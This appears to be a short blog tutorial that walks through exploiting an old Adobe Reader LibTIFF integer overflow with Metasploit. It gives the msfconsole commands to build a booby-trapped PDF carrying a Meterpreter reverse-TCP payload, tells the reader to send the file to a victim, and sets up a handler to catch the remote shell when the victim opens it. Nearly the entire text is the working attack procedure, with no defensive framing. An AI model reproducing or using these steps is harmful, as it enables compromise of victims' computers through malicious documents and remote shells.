Adobe Acrobat Bundled LibTIFF Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Exploit Targets
- Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass) (default)
Requirement :
Attacker :Backtrack
Victim PC : Windows
Step 1: open terminal and type msfconsole
Step 2: Now type use exploit/windows/fileformat/adobe_libtiff
set payload windows/meterpreter/reverse_tcp
show options
Step 3 : set the required parameters
set FILENAME result.pdf
set LHOST 192.168.56.102
exploit
Now the pdf file is created which we have to send at /root/.msf4/local/result.pdf
we have to send this file to victim
Step 4: to get the reverse connection we set the multi handler
Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use
use exploit/multi/handler
and
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit
as the victim click on it the meterpreter session is on we done the job
No comments:
Post a Comment